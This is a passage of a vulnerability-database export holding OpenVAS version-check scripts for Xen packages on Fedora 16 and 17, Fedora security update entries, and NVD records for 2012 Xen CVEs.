re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"xen on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~20.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:56:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "Check for the Version of xen", "modified": "2018-01-08T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864509", "href": "http://plugins.openvas.org/nasl.php?oid=864509", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 17\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\");\n script_id(864509);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-9386\");\n script_name(\"Fedora Update for xen FEDORA-2012-9386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~20.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3433", "CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "The remote host is missing an update for the 'xen' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2012-08-24T00:00:00", "id": "OPENVAS:1361412562310864639", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864639", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11785", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11785\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085369.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864639\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-24 09:54:16 +0530 (Fri, 24 Aug 2012)\");\n script_cve_id(\"CVE-2012-3433\", \"CVE-2012-3432\", \"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-0029\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-11785\");\n script_name(\"Fedora Update for xen FEDORA-2012-11785\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"xen on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.3~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-01-03T10:56:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3433", "CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "Check for the Version of xen", "modified": "2018-01-03T00:00:00", "published": "2012-08-24T00:00:00", "id": "OPENVAS:864639", "href": "http://plugins.openvas.org/nasl.php?oid=864639", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11785", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11785\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 16\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085369.html\");\n script_id(864639);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-24 09:54:16 +0530 (Fri, 24 Aug 2012)\");\n script_cve_id(\"CVE-2012-3433\", \"CVE-2012-3432\", \"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-0029\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-11785\");\n script_name(\"Fedora Update for xen FEDORA-2012-11785\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.3~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.4, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "The remote host is missing an update for the 'xen' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2012-06-28T00:00:00", "id": "OPENVAS:1361412562310864494", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864494", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9399", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082754.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864494\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:34:52 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\",\n \"CVE-2012-0029\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-9399\");\n script_name(\"Fedora Update for xen FEDORA-2012-9399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"xen on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~8.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-05T21:26:27", "published": "2012-08-05T21:26:27", "id": "FEDORA:A2013212DB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.2-24.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-05T21:31:48", "published": "2012-08-05T21:31:48", "id": "FEDORA:638FD21667", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.2-9.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-21T09:48:25", "published": "2012-08-21T09:48:25", "id": "FEDORA:8E44A20A90", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-2.fc17", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-06-26T00:52:23", "published": "2012-06-26T00:52:23", "id": "FEDORA:00A04209F2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.2-20.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-21T09:53:53", "published": "2012-08-21T09:53:53", "id": "FEDORA:403F220D9F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.3-1.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-06-26T00:42:08", "published": "2012-06-26T00:42:08", "id": "FEDORA:0275A21469", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.2-8.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1583", "CVE-2011-1898", "CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command 
line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-06-26T00:41:50", "published": "2012-06-26T00:41:50", "id": "FEDORA:4C1E320FD7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: xen-4.1.2-8.fc15", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-09-17T17:45:19", "published": "2012-09-17T17:45:19", "id": "FEDORA:C1281214A6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-4.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-09-17T18:00:53", "published": "2012-09-17T18:00:53", "id": "FEDORA:63A4E21779", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.3-2.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411", 
"CVE-2012-4544"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-11-09T18:01:40", "published": "2012-11-09T18:01:40", "id": "FEDORA:A80012051E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-5.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T12:06:05", "description": "Xen 4.0, and 4.1, when running a 64-bit PV guest on \"older\" AMD CPUs, does not properly protect against a certain AMD processor bug, which allows local guest OS users to cause a denial of service (host hang) via sequential execution of instructions across a non-canonical boundary, a different vulnerability than CVE-2012-0217.", "edition": 3, "cvss3": {}, "published": "2012-12-03T21:55:00", "title": "CVE-2012-2934", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2934"], "modified": "2014-05-05T05:11:00", "cpe": ["cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:4.0.0"], "id": "CVE-2012-2934", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2934", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:4.1.0:-:*:*:*:*:x64:*", "cpe:2.3:o:xen:xen:4.0.0:-:*:*:*:*:x64:*"]}, {"lastseen": "2020-10-03T12:06:06", "description": "The handle_mmio function in arch/x86/hvm/io.c in the MMIO operations emulator for Xen 3.3 and 4.x, when running an HVM guest, 
does not properly reset certain state information between emulation cycles, which allows local guest OS users to cause a denial of service (guest OS crash) via unspecified operations on MMIO regions.", "edition": 3, "cvss3": {}, "published": "2012-12-03T21:55:00", "title": "CVE-2012-3432", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3432"], "modified": "2013-10-11T03:44:00", "cpe": ["cpe:/o:xen:xen:4.1.1", "cpe:/o:xen:xen:4.0.3", "cpe:/o:xen:xen:4.0.4", "cpe:/o:xen:xen:4.2.0", "cpe:/o:xen:xen:4.0.1", "cpe:/o:xen:xen:4.0.2", "cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:3.3.0", "cpe:/o:xen:xen:4.1.3", "cpe:/o:xen:xen:4.0.0", "cpe:/o:xen:xen:4.1.2"], "id": "CVE-2012-3432", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3432", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:05:59", "description": "Xen 3.4, 4.0, and 4.1, when the guest OS has not registered a handler for a syscall or sysenter instruction, does not properly clear a flag for exception injection 
when injecting a General Protection Fault, which allows local PV guest OS users to cause a denial of service (guest crash) by later triggering an exception that would normally be handled within Xen.", "edition": 3, "cvss3": {}, "published": "2012-12-03T21:55:00", "title": "CVE-2012-0218", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0218"], "modified": "2013-10-11T03:40:00", "cpe": ["cpe:/o:xen:xen:3.4.0", "cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:4.0.0"], "id": "CVE-2012-0218", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0218", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:20", "description": "The PyGrub boot loader in Xen unstable before changeset 25589:60f09d1ab1fe, 4.2.x, and 4.1.x allows local para-virtualized guest users to cause a denial of service (memory consumption) via a large (1) bzip2 or (2) lzma compressed kernel image.", "edition": 6, "cvss3": {}, "published": "2012-10-31T16:55:00", "title": "CVE-2012-2625", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", 
"baseScore": 2.7, "vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2625"], "modified": "2018-04-13T13:00:00", "cpe": ["cpe:/o:xen:xen:4.1.1", "cpe:/o:xen:xen:4.2.0", "cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:4.1.3", "cpe:/o:xen:xen:4.1.2"], "id": "CVE-2012-2625", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2625", "cvss": {"score": 2.7, "vector": "AV:A/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:15", "description": "The x86-64 kernel system-call functionality in Xen 4.1.2 and earlier, as used in Citrix XenServer 6.0.2 and earlier and other products; Oracle Solaris 11 and earlier; illumos before r13724; Joyent SmartOS before 20120614T184600Z; FreeBSD before 9.0-RELEASE-p3; NetBSD 6.0 Beta and earlier; Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1; and possibly other operating systems, when running on an Intel processor, incorrectly uses the sysret path in cases where a certain address is not a canonical address, which allows local users to gain privileges via a crafted application. NOTE: because this issue is due to incorrect use of the Intel specification, it should have been split into separate identifiers; however, there was some value in preserving the original mapping of the multi-codebase coordinated-disclosure effort to a single identifier.\nPer: http://technet.microsoft.com/en-us/security/bulletin/ms12-042\n\n'This vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2. 
